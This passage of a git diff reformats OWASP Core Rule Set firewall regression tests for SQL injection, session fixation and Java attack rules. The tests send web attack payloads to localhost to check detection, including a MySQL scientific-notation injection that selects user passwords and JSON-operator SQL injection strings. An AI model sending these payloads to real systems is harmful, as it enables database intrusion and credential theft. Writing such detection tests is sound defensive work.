127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 34 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '[1,2,3]'::json ->> 2='3' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 35 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_id: 36 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" - version: HTTP/1.0 - output: - log_contains: id "942550" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log_contains: id "942550" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml index 8e1cbfb5d..34ab0f5a7 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml @@ -2,40 +2,37 @@ meta: author: "Xhoenix, azurit" description: MySQL Scientific Notation bypass payloads Detection - enabled: true - name: 942560.yaml +rule_id: 942560 tests: - - test_title: 942560-1 + - test_id: 1 desc: "Positive test for Scientific Notation in MySQL, e.g 1.e(" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" - version: HTTP/1.0 - output: - log_contains: id "942560" - - test_title: 942560-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" + version: HTTP/1.0 + output: + log_contains: id "942560" + - test_id: 2 desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e(" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "foo=1.e(ascii)" - version: HTTP/1.0 - output: - log_contains: id "942560" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "foo=1.e(ascii)" + version: HTTP/1.0 + output: + log_contains: id "942560" diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml index 1713247d8..184b98ef0 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml @@ -2,48 +2,44 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 943100.yaml tests: - - test_title: 943100-1 + - test_id: 1 desc: Session Fixation Attack (943100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: '/get/foo.php?bar=blah' - version: HTTP/1.1 - output: - log_contains: id "943100" - - test_title: 943100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: '/get/foo.php?bar=blah' + version: HTTP/1.1 + output: + log_contains: id "943100" + - test_id: 2 desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/foo.php?test=.cookie;expires=" - version: HTTP/1.1 - output: - log_contains: id "943100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/foo.php?test=.cookie;expires=" + version: HTTP/1.1 + output: + log_contains: id "943100" diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml index 0802f4f46..f0d788032 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml @@ -2,84 +2,78 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 943110.yaml tests: - - test_title: 943110-1 + - test_id: 1 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http://www.attackersite.com/test - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943110" - - test_title: 943110-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http://www.attackersite.com/test + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log_contains: id "943110" + - test_id: 2 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://localhost.attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://localhost.attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log_contains: id "943110" + - test_id: 3 desc: "session fixation attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Referer: "https://attackersite.com/" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?phpsessid=asdfdasfadsads" - version: HTTP/1.0 - output: - log_contains: id "943110" - - test_title: 943110-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Referer: "https://attackersite.com/" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?phpsessid=asdfdasfadsads" + version: HTTP/1.0 + output: + log_contains: id "943110" + - test_id: 4 desc: Session Fixation Attack (943110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Content-Type: application/x-www-form-urlencoded - Host: localhost - Referer: http://localhost/test - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - no_log_contains: id "943110" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Content-Type: application/x-www-form-urlencoded + Host: localhost + Referer: http://localhost/test + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + no_log_contains: id "943110" diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index 9350814a3..ca4b42e14 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -2,26 +2,23 @@ meta: author: "csanders-git, azurit" description: None - enabled: true - name: 943120.yaml tests: - - test_title: 943120-1 + - test_id: 1 desc: Session Fixation Attack (943120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" - version: HTTP/1.1 - output: - log_contains: id "943120" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666" + version: HTTP/1.1 + output: + log_contains: id "943120" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml index 9cbf3d272..89a8d1154 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml @@ -1,27 +1,25 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944000.yaml" description: "Description" +rule_id: 944000 tests: - - test_title: 944000-1 + - test_id: 1 desc: Using text/plain Content-Type which do not have any bodyprocessor associated stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - uri: "/post" - data: "test=value" - output: - no_log_contains: "id \"944000\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + uri: "/post" + data: "test=value" + output: + no_log_contains: "id \"944000\"" diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml index 80705038d..ef283dc65 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml @@ -1,373 +1,354 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944100.yaml" description: "Description" +rule_id: 944100 tests: - - test_title: 944100-1 + - test_id: 1 desc: Argument test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - test_title: 944100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_id: 2 desc: Argument test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" - - test_title: 944100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" + - test_id: 3 desc: Argument name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944100\"" + - test_id: 4 desc: Argument name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944100\"" - - test_title: 944100-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944100\"" + - test_id: 5 desc: Cookie test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 6 desc: Cookie test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 7 desc: Cookie name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.Runtime=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.Runtime=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 8 desc: Cookie name includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.ProcessBuilder=test - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.ProcessBuilder=test + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 9 desc: Request header test includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.Runtime - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.Runtime + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 10 desc: Request header test includes keywords java.lang.ProcessBuilder stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.ProcessBuilder - method: POST - uri: "/post" - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.ProcessBuilder + method: POST + uri: "/post" + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_id: 11 desc: XML element includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_id: 12 desc: XML attribute name includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - test_title: 944100-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + uri: "/post" + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_id: 13 desc: XML attribute value includes keywords java.lang.Runtime stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - uri: "/post" - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - test_title: 944100-14 + - input: + dest_addr: 